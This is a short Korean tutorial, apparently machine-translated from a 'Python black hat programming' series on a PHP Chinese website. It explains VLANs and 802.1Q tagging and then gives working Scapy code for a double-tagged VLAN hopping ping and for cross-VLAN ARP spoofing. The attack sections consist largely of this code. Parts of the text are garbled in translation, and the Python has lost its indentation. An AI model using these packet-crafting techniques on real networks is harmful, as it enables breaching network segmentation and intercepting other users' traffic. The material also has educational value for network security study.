VLAN 전반에 걸친 Python 블랙햇 프로그래밍 3.4

VLAN(Virtual Local Area Network)은 이더넷 상호 작용 기술을 기반으로 구축된 가상 네트워크로, 동일한 물리적 네트워크를 여러 VALN으로 나눌 수 있을 뿐만 아니라 물리적 네트워크 장벽을 넘어 서로 다른 서브넷의 사용자를 동일한 네트워크로 나눌 수 있습니다. VLAN. 그림 2는 VLAN 분할의 예이다.

그림 2

VLAN을 구현하는 방법에는 일반적으로 스위칭 장비에 따라 두 가지 유형이 있습니다.

l 스위치 기반 포트 분할

l IEEE 802.1q 프로토콜 기반, 확장 이더넷 프레임 형식

Layer 2 기반 VLAN 기술에는 여러 스위치에 걸쳐 설정된 동일한 VLAN의 구성원이 서로 통신할 수 있도록 서로 다른 스위치를 연결하는 데 사용되는 트렁킹이라는 개념이 있습니다. 스위치 간의 상호 연결에 사용되는 포트를 트렁크 포트라고 합니다. 80.2.1q 외에도 Cisco에는 ISL이라는 자체 트렁크 프로토콜이 있습니다.

그림 3

그림 3은 802.1q 데이터 패킷으로 일반 이더넷 프레임과 본질적으로 다르지 않습니다. VLAN 태그를 추가합니다. 빨간색 부분의 VLAN 식별자는 데이터 패킷이 어느 VLAN에 속해 있는지 식별하여 데이터 브로드캐스트 범위가 VLAN을 넘지 않도록 합니다.

이제 간단히 생각해 보겠습니다. VLAN을 통해 통신하려면 데이터 패킷의 식별자만 수정하면 되나요?

3.4.1 VLAN Hopping

위의 분석을 바탕으로 간단한 시나리오인 cross-VLAN을 고려합니다. ping, Vlan1의 호스트에서 Vlan2의 호스트로 ping 요청을 보냅니다.

특정 인코딩 전에 VLAN 패킷 구성 문제를 해결해야 합니다. Scapy에서는 Dot1Q 클래스를 사용하여 그림 3의 태그 부분을 구성합니다. 그림 4와 같습니다.

그림 4

이제 교차 VLAN 핑 요청을 작성할 수 있습니다.

#!/usr/bin/python 
from scapy.all import * 
packet = Ether(dst="c0:d3:de:ad:be:ef") / \
Dot1Q(vlan=1) / \
Dot1Q(vlan=2) / \
IP(dst="192.168.13.3") / \
ICMP() 
sendp(packet)

위 코드에서는 대상 호스트의 MAC 및 IP 주소를 지정하고 두 개의 VLAN 식별자를 추가합니다. 첫 번째는 전송용입니다. data 호스트가 위치한 VLAN이고, 두 번째는 대상 호스트가 위치한 VLAN입니다. 스위치는 첫 번째 식별자를 제거하고 두 번째 식별자를 읽으면 패킷을 대상 호스트로 전달합니다.

3.4.2 교차 VLAN ARP 스푸핑

섹션 3.1, 3.2 및 3.3 우리 모두는 ARP 스푸핑 문제에 대해 논의하고 있습니다. VLAN은 브로드캐스트 도메인을 제한하므로 이전 코드는 VLAN 전체에서 ARP 스푸핑을 수행할 수 없습니다. 하지만 이 문제를 해결하는 방법은 매우 간단합니다. 앞서 구성한 ARP 스푸핑 데이터에 VLAN 식별자만 삽입하면 됩니다. 다음 코드는 섹션 3.1에서 ARP 요청 패킷을 구성하는 데 사용한 코드입니다.

def build_req():
if options.target is None:
pkt = Ether(src=mac, dst='ff:ff:ff:ff:ff:ff') / ARP(hwsrc=mac, psrc=args[0], pdst=args[0])
elif options.target:
target_mac = getmacbyip(options.target)
if target_mac is None:
print "[-] Error: Could not resolve targets MAC address"
sys.exit(1)
pkt = Ether(src=mac, dst=target_mac) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)
return pkt

데이터 패킷 구성 부분에서 VLAN 식별자를 삽입합니다:

pkt = Ether(src=mac, dst=target_mac) /Dot1Q(vlan=our_vlan) / Dot1Q(vlan=target_vlan) / ARP(hwsrc=mac, psrc=args[0], hwdst=target_mac, pdst=options.target)

이러한 방식으로 VLAN 간 ARP 스푸핑이 가능합니다.

3.4.3 요약

이 섹션에서는 주로 VLAN을 스푸핑하여 교차 통신을 달성하는 데이터 패킷을 구성하는 방법에 대해 설명합니다. -VLAN 데이터 통신 및 ARP 스푸핑 목적. 이 문서의 방법은 주로 802.1Q 프로토콜에 대한 것이며 포트에 의해 물리적으로 격리된 VLAN에는 영향을 미치지 않습니다.

위는 편집자가 소개한 VLAN 전반에 걸친 Python 블랙햇 프로그래밍 3.4에 대한 자세한 설명입니다. 궁금한 점이 있으면 메시지를 남겨주세요. 편집자는 제 시간에 응답할 것입니다. 또한 PHP 중국어 웹사이트를 지원해 주신 모든 분들께 감사드립니다!

더 많은 Python black hat 프로그래밍 3.4 VLAN 간 관련 기사를 보려면 PHP 중국어 웹사이트를 주목하세요!